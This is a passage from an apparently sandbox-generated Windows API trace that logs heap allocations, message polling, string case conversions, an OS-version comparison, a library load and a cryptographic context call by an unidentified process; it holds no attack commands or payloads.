lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.414] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.414] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.414] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.414] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0254.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.414] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0254.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.415] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.415] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.416] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.417] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0254.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0254.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.418] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0254.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.419] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.419] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.419] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0254.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0254.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.420] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0254.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0254.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.421] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0254.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0254.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.421] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.421] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.422] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.423] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.423] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.424] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.425] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.425] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.425] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.425] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.425] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.425] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.425] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.425] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0254.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0254.426] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.427] RtlAllocateHeap (HeapHandle=0x25c0000, 